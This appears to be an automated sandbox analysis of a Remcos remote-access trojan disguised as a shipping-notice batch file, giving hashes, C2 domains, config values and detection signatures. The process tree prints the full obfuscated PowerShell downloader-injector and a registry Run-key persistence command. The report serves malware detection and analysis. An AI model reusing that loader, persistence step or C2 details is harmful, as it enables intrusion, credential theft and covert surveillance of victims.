Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-11-2024 05:58

General

  • Target

    awb_shipping_post_28112024224782020031808174CN28112024000001124.bat

  • Size

    6KB

  • MD5

    f37fb720f0662ce5bac44b7e19b03864

  • SHA1

    daeac2db53e78b1139d1ef3351ecda6c66deb09e

  • SHA256

    df2cba523549cdb60b69c1de396325a4bf3d86d1013378a169273c4aa99d4da9

  • SHA512

    9aa63156cb66c548a0703c3f0a21d0e26d7939c62c0268b909e8c9ae3a1189753c3c0cec18e3e5e4cd806e4ea274e721faa0e41ee6cfd36a862ba581201b33fc

  • SSDEEP

    192:YEo+WKuRms3YnN5ekWwsQRbXwwgYTVVSGogXs3:DojPgs3UN5LWw7RDwwppjvc3

Malware Config

Extracted

Family

remcos

Botnet

A$ian

C2

iwarsut775laudryed1.duckdns.org:57484

iwarsut775laudryed1.duckdns.org:57483

iwarsut775laudryed2.duckdns.org:57484

iwarsut775laudryed3.duckdns.org:57484

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    true

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    hmbnspt.dat

  • keylog_flag

    false

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    shibuetgtst-WMSLPY

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: MapViewOfSection 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 57 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\awb_shipping_post_28112024224782020031808174CN28112024000001124.bat"
    1⤵
    • System Network Configuration Discovery: Internet Connection Discovery
    • Suspicious use of WriteProcessMemory
    PID:1300
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden ";$Medallionist='Tyrosinase';;$Cream='Reedbirds';;$Gimmicker='Filterability';;$Branchiocardiac='Kanons176';;$Strandvejen178='Hysteranthous';;$Tagmemes=$host.Name;function Ignorher($brugeradgangskodes){If ($Tagmemes) {$Stillevejen=5} for ($Modifikationers=$Stillevejen;;$Modifikationers+=6){if(!$brugeradgangskodes[$Modifikationers]) { break }$Unring132+=$brugeradgangskodes[$Modifikationers]}$Unring132}function Bibeholdelsernes($Objektsprogs){ .($Tjenestemandsansats) ($Objektsprogs)}$Kulturbegivenheden=Ignorher ' PrednPlejeeTauroTP iap. BoxtwGravreNonsebmo otCAutokl RubbICoaduEStahlnPlurit';$Chiniofon=Ignorher 'Pto aM I dvoTrommzKoketiHightlHa.drl Yella Unlo/';$Untoppled=Ignorher 'FejlfTNervelSundhsOphng1 inge2';$Undervisningspligtige=' Fle.[ Ami NChumaERestaTpassb.TornoSSta leHonn.RC nseV Perui ndskc llegeExtinp Disaosar eiNoritnGaulltLettem.lgorAEidolNUoverAAfgifgSt laE An,eRUrete]Foutr:Snore:BefipS MuntEHavanCA.penutyt,erFatteIGenavTToxicYVrdigp GeneR.holao Co.gTRok,uoPortaCLambiO S inLDayr,=Vrlsl$ BedaUA,vernP mpetWh.weO eos PSquirpbkkenLBe,isEcarbuD';$Chiniofon+=Ignorher 'Dyrkn5Uafla.Be,an0Breto vold( erdeWEquiliJouncn SlavdCurreoHmoglwYderrs Slid ForskNA tacTSagso Diagr1Depri0Sid l. ocal0Emmar;Voksn BoniWRevyeiFidgenBalan6Gugge4Regnb;Frag anskuxAlec,6Undse4Impas; B ot Caulr depovNitra:Stvgr1 Sma.3 Pych1 Infl..asta0Nazif) Accu GendbGForbleKontocdanaik SereoBeslu/ V ri2Asfe 0Barry1Troph0.itha0Fremd1Tatte0 Indl1Perga KupezFOutwaiVallirSprineTur ufDuplioSjlstxbaadt/ ,ace1 Sv s3Graen1Di fu. Dep,0';$Sjussendes=Ignorher 'Moh iuDi trsSavoneKnstrRMilli-OblivAQuantgNettoeRevarnKlockT';$Styrtgodsets=Ignorher 'SoleuhBudbrtSt vbtReforpUnivesSens,: pbyd/Tai.b/EndodgSamm aDeplorAppethDrmmeounexcuIridod CostjC nado AbsquFor.br RomamSlids.PlaticBrekkospiramUnc a/Sv ngPTho,goSolnepElekt2Limfa.SkummpUdpolnJohangBundt>Leucoh BaketTurbetUnbeap.arens,xtem:G,nop/ Bank/Su.dogIn baaQuellrarterh Reduo Nomau ForfdEndowjLangboPrintuse vmrUngoamHjernoForfanInjuneVansk. Precc.malgo ummemTaluk/ L.nnPSve sowiss,pNonni2Inter.AfkorpHermenSne jg';$Tonguester=Ignorher 'Badme>';$Tjenestemandsansats=Ignorher 'LogicIKinesE ksax';$Reinspector='Udgiftsfringers';$Oplysningslinier='\Metoposcopist.Rat';Bibeholdelsernes (Ignorher ' Sprt$NonsyGDec,mlafmaloKildeBSemicASeptaLSorte:RaadsmTran aFerasg ByhanU.gkaUCitraSUdfldsHan oES adiN Peri=Seric$SquileDe.asnR flivAller:Aepy.AHan,npRok.ePFrostD FortaLogouTDoughASkild+ u,il$.enteOAfbrnpLejedLPhospYNdrinsMillinAtaliIRa iaNPro uGRuffeSForesLPab sIPredenpartrIU dereEchoiR');Bibeholdelsernes (Ignorher 'alkoh$YpperGModsiLjovilo D.bbb nweaAHder,lLimon: ,rbeh CatrU AurigCampauTowarEGalden ninoo PallT.impliFidusCKrage=Tolds$BrutasDerivTMascuYGuerdr.gesaTCroniGChylioSpis,D Aus.SMusc,eGoofyTOrmuzS,orfa. Ra iSEfterpFor,aLFrog I PicrTstad,( uadr$OverfT Tre OLeng,NOutdogSrgebuLefleE corssSengeT OcclENormaRKoste)');Bibeholdelsernes (Ignorher $Undervisningspligtige);$Styrtgodsets=$Huguenotic[0];$Verdensbermte245=(Ignorher 'Cheon$NovelgSimpllunderoPitwoBOncogA rednlHeath:SpragaLact gKonvorBarbaIAl.erOMobsmtFeder=A greNCauliEEng nWAvici-HeephostrafB AfvijTuetseFratecDorottBest GastrS co,sYOps,rS Phost paatE,atchMSupe.. Inte$ForsyKLadcyuNoninl EloxTGoldmuBortrr ,nylbYankeeSilliGSchwei elonvKompae orlenEteoch FolkeexfoddPrecoeKendeN');Bibeholdelsernes ($Verdensbermte245);Bibeholdelsernes (Ignorher 'M,sta$ AttiAEjbrigUndocrEquiniUvul,o Fr mtDefos. D.poH rudee CrosaMoha dCataseS,iffrRuykosDevil[Actin$ReiduSHobosjBhut uT ffesUtaalsMicr,e Cig n.ilstdHer ieEconosUnf o]Fibri= c ck$SimulChelinhGree i PsalnDdskniAnparoSi.rafC.stooLedevn');$Hjhusets=Ignorher 'Overd$ Occ AByporgKarenr.kskliCasbaoTascat Outr.ruelsDLiparoSneb,wAtominRediglHypo oBlinda nstad ci aFSc otiOptatl Re.se Reco( Kno $HaandSMiss tGallsy Ve nrAbductTrippgEvertoGraasd,onkosHarmoe howtYtri sMa,da,tagdr$DereaBHakkeoSkrivyG.llekOmhanoM.dbetNonsptSengeeImagetGloe )';$Boykottet=$Magnussen;Bibeholdelsernes (Ignorher 'Frans$OmganGTronaLFllesOFrbevbEurasACo lolG.aaf: B gsAHoldnCUdenlC ftee,hospPT rpeTExfetA Tingb Cer,ECo pllFinaltAkros=Drill(AnstatSa viESvngnsAnysrt,omfr-Lyna,pitha.aboyauT KippHInhab triak$StabsbDagspO JagtyIm ieK tubboPyttaT In itEmbryeHagerT Ency)');while (!$Acceptabelt) {Bibeholdelsernes (Ignorher 'S rut$Reo hg DebulCo,taosalutbS,aala lmenlUnsqu:HleriTWaferiBlgebl oreahAstrouLngd gSn.sdnPseudiGrandn rembgVejbye,dholrUn onnRestre ortr=Caval$ Sk,mMR kshaFy,stg L,vunFrosti Carbf.ygefiPalmec eside tjlen roct') ;Bibeholdelsernes $Hjhusets;Bibeholdelsernes (Ignorher 'Antabs ammotValueaPuppeRspekttHelti- ranssInterlPresaeInvenePunleP B st Orkid4');Bibeholdelsernes (Ignorher ' ala$Skittg NonsLBedr OLen tbS alsaZi.ziLpee.a: MowaA,illeC FletCGenneEJvnfrp ultit Pse.AAfd ibContreBronzlAnlgsTTh.gg=thirt(OpsugTSellaeVastisUsympTBlast-Je stPMarmoaIdenttHoptoh Mom. For k$ RaadbTubero PycnY UrteKG itao.chsaTFedtptWellfE t rbtFibov)') ;Bibeholdelsernes (Ignorher ' f de$togemG,recklBiogrOKommebRegneaDavidLForkr:ProvsSPosttkGra.daVrdigLTz,mmPMoul mUnco a yranrTangl=K ekr$Fere,GDisselG omoOTaberBBlomsADybdelMi ro:InterASurgefSerraHskaanvS,radlMicroeDi,soN rphadLu reESladrsSamle+ snor+Tramp% Tom $UrhnehFrem uN uriGStarsu SaedeUnethNSparrOban.uT langi AskeCTr ne.Non ecmurreOCitrou Fi rN Dry,t') ;$Styrtgodsets=$Huguenotic[$Skalpmar]}$Herbs=324054;$Grnsevrdi45=32132;Bibeholdelsernes (Ignorher 'Kamgr$Ph liGHono,LSpl,tOCellmB CirkAPegaslTruss:Gaf.ebNontyIDe,idl ContlOcellePresbdTe ses Nos,KUidenroversM SkefeAstak Unvar=,alat salivGDumbyeenspntDjrvh-D.ailCBriosoTemp.nCruxftMorgeESlut n Rvestreabb Achro$,nchobusmm oye.omYTuskhkYde los ueptSupe,TParaneUdf,yt');Bibeholdelsernes (Ignorher 'di ho$samiagNonmalBo asoSyst bRuskra C ndlPassi:UnoblLLoud,i UngarOverfiGrns,p oruri knlip Ra ieSupra Rotu =Gener Ha,d[SinicS valey BondsSvngntInhumeFor.smpetro. Mo eCAbreioArguinMonarvIldkueHewlerFladltCharc]Vamos:T wag:PhysaFAromarEskoroFlyvem aladB Sud.a Convs Rec,eBorgm6Panel4ZippeSPavektMaterrNontaiGuffenSkarngdevoi( oral$UnsouBSamoriMout.l FarvlTe dieInterd Tribs ModakUvsner G anm F ereEks,e)');Bibeholdelsernes (Ignorher 'Ka tr$Hyp rGClewsl UtilO .rivBT.nakaT.staLKaffe:Te efuInstaN SurrDInfert DoupAContrgDejagECloacL SterSPa lyeSkinds,emitBSpin eKvldeSLong,tFo.dme appmBu esMEucalEFasellBesviS redbE CubiN Vad. Jamb=Re en Melle[TriviSSu.styFla mS obultKrypte KmpemDkner.s.lgsT P steNaboiXN nlat uadr.Spunse DedenSyrneC Verso,odlyd Regei ForhnGnastgSelen]Menue:hemit:Sha tALitteSIllegC statI On,uiHiber.Centig ScarEpukleT KontSGr wntBrystr Midti KvinN R jsG Untr(Count$ DuodlF guriVurderR selIMindrpExtreIPens PA,parESuper)');Bibeholdelsernes (Ignorher ' ongr$MargiGAnascLNonavo Margb,rundAGuineLWivia: edlehB dknKJos pK Sto E orfaL RetsBDecusEUhyrlnCarroE BranSS,rot= snre$ no auMinicNindkodBuffeTS enkA.igmaGL gkaeSamfuLPrydesCw.ite Af aSUnderB.elviE Gal sHyb,iTUdst EDeglamR conmCume.eski oLPardasIsotoEHaloxN okse.MdeafsDest UBssesBNixonsNyblotExplaR,ysstIIndflnDoktogPolyp(Inter$ M.ndHK naleDelstR uoyeBRkedaSLling,Bla k$Gulchg Po trColomnProgrsArterE AcylvUb leRFertiDAbsceISkole4amtst5M ter)');Bibeholdelsernes $hkkelbenes;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3088
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Medallionist='Tyrosinase';;$Cream='Reedbirds';;$Gimmicker='Filterability';;$Branchiocardiac='Kanons176';;$Strandvejen178='Hysteranthous';;$Tagmemes=$host.Name;function Ignorher($brugeradgangskodes){If ($Tagmemes) {$Stillevejen=5} for ($Modifikationers=$Stillevejen;;$Modifikationers+=6){if(!$brugeradgangskodes[$Modifikationers]) { break }$Unring132+=$brugeradgangskodes[$Modifikationers]}$Unring132}function Bibeholdelsernes($Objektsprogs){ .($Tjenestemandsansats) ($Objektsprogs)}$Kulturbegivenheden=Ignorher ' PrednPlejeeTauroTP iap. BoxtwGravreNonsebmo otCAutokl RubbICoaduEStahlnPlurit';$Chiniofon=Ignorher 'Pto aM I dvoTrommzKoketiHightlHa.drl Yella Unlo/';$Untoppled=Ignorher 'FejlfTNervelSundhsOphng1 inge2';$Undervisningspligtige=' Fle.[ Ami NChumaERestaTpassb.TornoSSta leHonn.RC nseV Perui ndskc llegeExtinp Disaosar eiNoritnGaulltLettem.lgorAEidolNUoverAAfgifgSt laE An,eRUrete]Foutr:Snore:BefipS MuntEHavanCA.penutyt,erFatteIGenavTToxicYVrdigp GeneR.holao Co.gTRok,uoPortaCLambiO S inLDayr,=Vrlsl$ BedaUA,vernP mpetWh.weO eos PSquirpbkkenLBe,isEcarbuD';$Chiniofon+=Ignorher 'Dyrkn5Uafla.Be,an0Breto vold( erdeWEquiliJouncn SlavdCurreoHmoglwYderrs Slid ForskNA tacTSagso Diagr1Depri0Sid l. ocal0Emmar;Voksn BoniWRevyeiFidgenBalan6Gugge4Regnb;Frag anskuxAlec,6Undse4Impas; B ot Caulr depovNitra:Stvgr1 Sma.3 Pych1 Infl..asta0Nazif) Accu GendbGForbleKontocdanaik SereoBeslu/ V ri2Asfe 0Barry1Troph0.itha0Fremd1Tatte0 Indl1Perga KupezFOutwaiVallirSprineTur ufDuplioSjlstxbaadt/ ,ace1 Sv s3Graen1Di fu. Dep,0';$Sjussendes=Ignorher 'Moh iuDi trsSavoneKnstrRMilli-OblivAQuantgNettoeRevarnKlockT';$Styrtgodsets=Ignorher 'SoleuhBudbrtSt vbtReforpUnivesSens,: pbyd/Tai.b/EndodgSamm aDeplorAppethDrmmeounexcuIridod CostjC nado AbsquFor.br RomamSlids.PlaticBrekkospiramUnc a/Sv ngPTho,goSolnepElekt2Limfa.SkummpUdpolnJohangBundt>Leucoh BaketTurbetUnbeap.arens,xtem:G,nop/ Bank/Su.dogIn baaQuellrarterh Reduo Nomau ForfdEndowjLangboPrintuse vmrUngoamHjernoForfanInjuneVansk. Precc.malgo ummemTaluk/ L.nnPSve sowiss,pNonni2Inter.AfkorpHermenSne jg';$Tonguester=Ignorher 'Badme>';$Tjenestemandsansats=Ignorher 'LogicIKinesE ksax';$Reinspector='Udgiftsfringers';$Oplysningslinier='\Metoposcopist.Rat';Bibeholdelsernes (Ignorher ' Sprt$NonsyGDec,mlafmaloKildeBSemicASeptaLSorte:RaadsmTran aFerasg ByhanU.gkaUCitraSUdfldsHan oES adiN Peri=Seric$SquileDe.asnR flivAller:Aepy.AHan,npRok.ePFrostD FortaLogouTDoughASkild+ u,il$.enteOAfbrnpLejedLPhospYNdrinsMillinAtaliIRa iaNPro uGRuffeSForesLPab sIPredenpartrIU dereEchoiR');Bibeholdelsernes (Ignorher 'alkoh$YpperGModsiLjovilo D.bbb nweaAHder,lLimon: ,rbeh CatrU AurigCampauTowarEGalden ninoo PallT.impliFidusCKrage=Tolds$BrutasDerivTMascuYGuerdr.gesaTCroniGChylioSpis,D Aus.SMusc,eGoofyTOrmuzS,orfa. Ra iSEfterpFor,aLFrog I PicrTstad,( uadr$OverfT Tre OLeng,NOutdogSrgebuLefleE corssSengeT OcclENormaRKoste)');Bibeholdelsernes (Ignorher $Undervisningspligtige);$Styrtgodsets=$Huguenotic[0];$Verdensbermte245=(Ignorher 'Cheon$NovelgSimpllunderoPitwoBOncogA rednlHeath:SpragaLact gKonvorBarbaIAl.erOMobsmtFeder=A greNCauliEEng nWAvici-HeephostrafB AfvijTuetseFratecDorottBest GastrS co,sYOps,rS Phost paatE,atchMSupe.. Inte$ForsyKLadcyuNoninl EloxTGoldmuBortrr ,nylbYankeeSilliGSchwei elonvKompae orlenEteoch FolkeexfoddPrecoeKendeN');Bibeholdelsernes ($Verdensbermte245);Bibeholdelsernes (Ignorher 'M,sta$ AttiAEjbrigUndocrEquiniUvul,o Fr mtDefos. D.poH rudee CrosaMoha dCataseS,iffrRuykosDevil[Actin$ReiduSHobosjBhut uT ffesUtaalsMicr,e Cig n.ilstdHer ieEconosUnf o]Fibri= c ck$SimulChelinhGree i PsalnDdskniAnparoSi.rafC.stooLedevn');$Hjhusets=Ignorher 'Overd$ Occ AByporgKarenr.kskliCasbaoTascat Outr.ruelsDLiparoSneb,wAtominRediglHypo oBlinda nstad ci aFSc otiOptatl Re.se Reco( Kno $HaandSMiss tGallsy Ve nrAbductTrippgEvertoGraasd,onkosHarmoe howtYtri sMa,da,tagdr$DereaBHakkeoSkrivyG.llekOmhanoM.dbetNonsptSengeeImagetGloe )';$Boykottet=$Magnussen;Bibeholdelsernes (Ignorher 'Frans$OmganGTronaLFllesOFrbevbEurasACo lolG.aaf: B gsAHoldnCUdenlC ftee,hospPT rpeTExfetA Tingb Cer,ECo pllFinaltAkros=Drill(AnstatSa viESvngnsAnysrt,omfr-Lyna,pitha.aboyauT KippHInhab triak$StabsbDagspO JagtyIm ieK tubboPyttaT In itEmbryeHagerT Ency)');while (!$Acceptabelt) {Bibeholdelsernes (Ignorher 'S rut$Reo hg DebulCo,taosalutbS,aala lmenlUnsqu:HleriTWaferiBlgebl oreahAstrouLngd gSn.sdnPseudiGrandn rembgVejbye,dholrUn onnRestre ortr=Caval$ Sk,mMR kshaFy,stg L,vunFrosti Carbf.ygefiPalmec eside tjlen roct') ;Bibeholdelsernes $Hjhusets;Bibeholdelsernes (Ignorher 'Antabs ammotValueaPuppeRspekttHelti- ranssInterlPresaeInvenePunleP B st Orkid4');Bibeholdelsernes (Ignorher ' ala$Skittg NonsLBedr OLen tbS alsaZi.ziLpee.a: MowaA,illeC FletCGenneEJvnfrp ultit Pse.AAfd ibContreBronzlAnlgsTTh.gg=thirt(OpsugTSellaeVastisUsympTBlast-Je stPMarmoaIdenttHoptoh Mom. For k$ RaadbTubero PycnY UrteKG itao.chsaTFedtptWellfE t rbtFibov)') ;Bibeholdelsernes (Ignorher ' f de$togemG,recklBiogrOKommebRegneaDavidLForkr:ProvsSPosttkGra.daVrdigLTz,mmPMoul mUnco a yranrTangl=K ekr$Fere,GDisselG omoOTaberBBlomsADybdelMi ro:InterASurgefSerraHskaanvS,radlMicroeDi,soN rphadLu reESladrsSamle+ snor+Tramp% Tom $UrhnehFrem uN uriGStarsu SaedeUnethNSparrOban.uT langi AskeCTr ne.Non ecmurreOCitrou Fi rN Dry,t') ;$Styrtgodsets=$Huguenotic[$Skalpmar]}$Herbs=324054;$Grnsevrdi45=32132;Bibeholdelsernes (Ignorher 'Kamgr$Ph liGHono,LSpl,tOCellmB CirkAPegaslTruss:Gaf.ebNontyIDe,idl ContlOcellePresbdTe ses Nos,KUidenroversM SkefeAstak Unvar=,alat salivGDumbyeenspntDjrvh-D.ailCBriosoTemp.nCruxftMorgeESlut n Rvestreabb Achro$,nchobusmm oye.omYTuskhkYde los ueptSupe,TParaneUdf,yt');Bibeholdelsernes (Ignorher 'di ho$samiagNonmalBo asoSyst bRuskra C ndlPassi:UnoblLLoud,i UngarOverfiGrns,p oruri knlip Ra ieSupra Rotu =Gener Ha,d[SinicS valey BondsSvngntInhumeFor.smpetro. Mo eCAbreioArguinMonarvIldkueHewlerFladltCharc]Vamos:T wag:PhysaFAromarEskoroFlyvem aladB Sud.a Convs Rec,eBorgm6Panel4ZippeSPavektMaterrNontaiGuffenSkarngdevoi( oral$UnsouBSamoriMout.l FarvlTe dieInterd Tribs ModakUvsner G anm F ereEks,e)');Bibeholdelsernes (Ignorher 'Ka tr$Hyp rGClewsl UtilO .rivBT.nakaT.staLKaffe:Te efuInstaN SurrDInfert DoupAContrgDejagECloacL SterSPa lyeSkinds,emitBSpin eKvldeSLong,tFo.dme appmBu esMEucalEFasellBesviS redbE CubiN Vad. Jamb=Re en Melle[TriviSSu.styFla mS obultKrypte KmpemDkner.s.lgsT P steNaboiXN nlat uadr.Spunse DedenSyrneC Verso,odlyd Regei ForhnGnastgSelen]Menue:hemit:Sha tALitteSIllegC statI On,uiHiber.Centig ScarEpukleT KontSGr wntBrystr Midti KvinN R jsG Untr(Count$ DuodlF guriVurderR selIMindrpExtreIPens PA,parESuper)');Bibeholdelsernes (Ignorher ' ongr$MargiGAnascLNonavo Margb,rundAGuineLWivia: edlehB dknKJos pK Sto E orfaL RetsBDecusEUhyrlnCarroE BranSS,rot= snre$ no auMinicNindkodBuffeTS enkA.igmaGL gkaeSamfuLPrydesCw.ite Af aSUnderB.elviE Gal sHyb,iTUdst EDeglamR conmCume.eski oLPardasIsotoEHaloxN okse.MdeafsDest UBssesBNixonsNyblotExplaR,ysstIIndflnDoktogPolyp(Inter$ M.ndHK naleDelstR uoyeBRkedaSLling,Bla k$Gulchg Po trColomnProgrsArterE AcylvUb leRFertiDAbsceISkole4amtst5M ter)');Bibeholdelsernes $hkkelbenes;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3304
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
        PID:2720
      • C:\Windows\SysWOW64\msiexec.exe
        "C:\Windows\SysWOW64\msiexec.exe"
        2⤵
          PID:4856
        • C:\Windows\SysWOW64\msiexec.exe
          "C:\Windows\SysWOW64\msiexec.exe"
          2⤵
            PID:4552
          • C:\Windows\SysWOW64\msiexec.exe
            "C:\Windows\SysWOW64\msiexec.exe"
            2⤵
              PID:2428
            • C:\Windows\SysWOW64\msiexec.exe
              "C:\Windows\SysWOW64\msiexec.exe"
              2⤵
                PID:2852
              • C:\Windows\SysWOW64\msiexec.exe
                "C:\Windows\SysWOW64\msiexec.exe"
                2⤵
                  PID:3612
                • C:\Windows\SysWOW64\msiexec.exe
                  "C:\Windows\SysWOW64\msiexec.exe"
                  2⤵
                    PID:3868
                  • C:\Windows\SysWOW64\msiexec.exe
                    "C:\Windows\SysWOW64\msiexec.exe"
                    2⤵
                      PID:1316
                    • C:\Windows\SysWOW64\msiexec.exe
                      "C:\Windows\SysWOW64\msiexec.exe"
                      2⤵
                        PID:1496
                      • C:\Windows\SysWOW64\msiexec.exe
                        "C:\Windows\SysWOW64\msiexec.exe"
                        2⤵
                          PID:764
                        • C:\Windows\SysWOW64\msiexec.exe
                          "C:\Windows\SysWOW64\msiexec.exe"
                          2⤵
                            PID:4604
                          • C:\Windows\SysWOW64\dxdiag.exe
                            "C:\Windows\SysWOW64\dxdiag.exe"
                            2⤵
                            • Suspicious use of NtCreateThreadExHideFromDebugger
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious use of SetThreadContext
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: MapViewOfSection
                            • Suspicious use of SetWindowsHookEx
                            • Suspicious use of WriteProcessMemory
                            PID:1276
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Skyggebillederne" /t REG_EXPAND_SZ /d "%Bestillingssiden% -windowstyle 1 $Kraasesuppe=(gp -Path 'HKCU:\Software\Claque\').Hingism;%Bestillingssiden% ($Kraasesuppe)"
                              3⤵
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of WriteProcessMemory
                              PID:4884
                              • C:\Windows\SysWOW64\reg.exe
                                REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Skyggebillederne" /t REG_EXPAND_SZ /d "%Bestillingssiden% -windowstyle 1 $Kraasesuppe=(gp -Path 'HKCU:\Software\Claque\').Hingism;%Bestillingssiden% ($Kraasesuppe)"
                                4⤵
                                • Adds Run key to start application
                                • System Location Discovery: System Language Discovery
                                • Modifies registry key
                                PID:3768
                            • C:\Windows\SysWOW64\dxdiag.exe
                              C:\Windows\System32\dxdiag.exe /stext "C:\Users\Admin\AppData\Local\Temp\jydzhvzilygaqknwgzbstmtq"
                              3⤵
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              PID:3560
                            • C:\Windows\SysWOW64\dxdiag.exe
                              C:\Windows\System32\dxdiag.exe /stext "C:\Users\Admin\AppData\Local\Temp\uarriokjzgyfbyjapkomeznzvgqm"
                              3⤵
                              • Accesses Microsoft Outlook accounts
                              • System Location Discovery: System Language Discovery
                              PID:4228
                            • C:\Windows\SysWOW64\dxdiag.exe
                              C:\Windows\System32\dxdiag.exe /stext "C:\Users\Admin\AppData\Local\Temp\wuwkigddnpqjdexegnanheaqenzvwyy"
                              3⤵
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1444

                        Network

                        MITRE ATT&CK Enterprise v15

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Filesize

                          1KB

                          MD5

                          71444def27770d9071039d005d0323b7

                          SHA1

                          cef8654e95495786ac9347494f4417819373427e

                          SHA256

                          8438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9

                          SHA512

                          a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034

                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_305e4dtt.d41.ps1

                          Filesize

                          60B

                          MD5

                          d17fe0a3f47be24a6453e9ef58c94641

                          SHA1

                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                          SHA256

                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                          SHA512

                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                        • C:\Users\Admin\AppData\Local\Temp\jydzhvzilygaqknwgzbstmtq

                          Filesize

                          4KB

                          MD5

                          f1d2c01ce674ad7d5bad04197c371fbc

                          SHA1

                          4bf0ed04d156a3dc6c8d27e134ecbda76d3585aa

                          SHA256

                          25b006032deccd628940ef728fffe83b325a85de453a34691f55f570e4460094

                          SHA512

                          81cb982cc33dcc27600a8a681c3ec3cc5b9221b95baa45e1ab24479745a9638b9f31d7beeeb1128b3294ff69b44e958c75e25d565f66790c364665caff96ee77

                        • C:\Users\Admin\AppData\Roaming\Metoposcopist.Rat

                          Filesize

                          463KB

                          MD5

                          f1e051f3aaa58d075d105694556aa551

                          SHA1

                          c9cc0b56985131d889fdadc263e708af200fe79c

                          SHA256

                          aa6882110f1bc455a4e6d61e443cb0930df88f089eabab30c56d8059b002a5b3

                          SHA512

                          e675f43ccf46a8e33ed344800c763f4d895c6af2e9b27ef49acd354eee7ac8ff5803b4926d199677b19b9428054fbdadec2985b9ad1b22b156478d36bb1c55dd

                        • memory/1276-90-0x0000000020A20000-0x0000000020A39000-memory.dmp

                          Filesize

                          100KB

                        • memory/1276-62-0x0000000000400000-0x00000000005E4000-memory.dmp

                          Filesize

                          1.9MB

                        • memory/1276-71-0x0000000000400000-0x00000000005E4000-memory.dmp

                          Filesize

                          1.9MB

                        • memory/1276-93-0x0000000020A20000-0x0000000020A39000-memory.dmp

                          Filesize

                          100KB

                        • memory/1276-94-0x0000000020A20000-0x0000000020A39000-memory.dmp

                          Filesize

                          100KB

                        • memory/1444-86-0x0000000000400000-0x0000000000424000-memory.dmp

                          Filesize

                          144KB

                        • memory/1444-85-0x0000000000400000-0x0000000000424000-memory.dmp

                          Filesize

                          144KB

                        • memory/1444-87-0x0000000000400000-0x0000000000424000-memory.dmp

                          Filesize

                          144KB

                        • memory/3088-20-0x00007FF8C10F0000-0x00007FF8C1BB1000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/3088-17-0x00007FF8C10F0000-0x00007FF8C1BB1000-memory.dmp

